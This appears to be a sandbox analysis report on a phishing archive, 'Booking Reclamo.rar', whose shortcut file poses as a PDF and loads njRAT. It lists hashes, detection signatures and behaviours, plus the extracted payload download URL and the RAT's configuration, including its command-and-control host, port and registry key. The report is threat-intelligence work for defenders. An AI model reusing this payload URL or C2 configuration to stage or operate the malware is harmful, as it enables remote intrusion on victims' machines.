General
-
Target
Booking Reclamo.rar
-
Size
1KB
-
Sample
220711-qba6zahcfj
-
MD5
a8f1175d93997c603efee5e8cfb048b8
-
SHA1
2b04d461f4af94125954752e13655e4512ac5d93
-
SHA256
75e7d9d5674a9274db2a258cefd7c03cd076d9615c580df36adc08b22f61333a
-
SHA512
5ccb0f4622442009a6ff1550b9a9388500a0be31716511f8e6ecfb6bf93ed4c552575e9b6ab673730ec4551731cc728800bdf1aad7ca7a3c3ca3cf68df04a56e
Static task
static1
Behavioral task
behavioral1
Sample
Booking Reclamo/Comprobante EDO DE CUENTA.pdf.lnk
Resource
win7-20220414-en
Malware Config
Extracted
http://20.231.55.108/dll/06-07-2022.PDF
Extracted
njrat
0.7NC
NYAN CAT
venomsi.mypsx.net:81
4c6c9a1bbdc34e6ebe
-
reg_key
4c6c9a1bbdc34e6ebe
-
splitter
@!#&^%$
Targets
-
-
Target
Booking Reclamo/Comprobante EDO DE CUENTA.pdf.lnk
-
Size
2KB
-
MD5
989a37a957676b33b4f844b510ac8a73
-
SHA1
fd521bf0365d7af925879d7b66dc54025051adb6
-
SHA256
ff0fd20583b4a4095e261eeeaba1b8be7be1fa837af4c882c9fe093bfd7892ea
-
SHA512
93ce019d8ff4b220199e5b2a4eda2d3717f368f7b890eed8eb04aac1dc56e9c2e5dc50b19eb4efde577b58168405eec55b787a80ca670e0e81119dc7943706dc
-
suricata: ET MALWARE Powershell commands sent B64 2
suricata: ET MALWARE Powershell commands sent B64 2
-
Blocklisted process makes network request
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Drops startup file
-
Suspicious use of SetThreadContext
-